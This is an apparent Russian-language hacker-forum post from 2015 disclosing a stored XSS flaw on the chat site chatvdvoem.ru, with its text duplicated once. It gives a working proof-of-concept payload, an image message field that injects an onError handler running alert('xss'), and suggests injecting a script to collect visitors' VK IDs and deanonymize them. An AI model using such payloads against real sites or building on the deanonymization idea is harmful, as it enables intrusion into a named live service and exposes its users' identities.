CKahn
18.08.2015, 01:00
Уязвимость на chatvdvoem.ru
Type: XSS
Для эксплуатации отравляем сообщение:
source:
Image_msg: x
" onError="
alert
(
'xss'
)
"
В теории можно вставить скрипт для получения id вк и деанонить пользователей сайта
image
IMAGE (https://hpc.name/redirector.html#http://pikbox.ru/img/12%2f20150818182950641chatvdvoem.png) http://pikbox.ru/img/12%2f20150818182950641chatvdvoem.png
Type: XSS
Для эксплуатации отравляем сообщение:
source:
Image_msg: x
" onError="
alert
(
'xss'
)
"
В теории можно вставить скрипт для получения id вк и деанонить пользователей сайта
image
IMAGE (https://hpc.name/redirector.html#http://pikbox.ru/img/12%2f20150818182950641chatvdvoem.png) http://pikbox.ru/img/12%2f20150818182950641chatvdvoem.png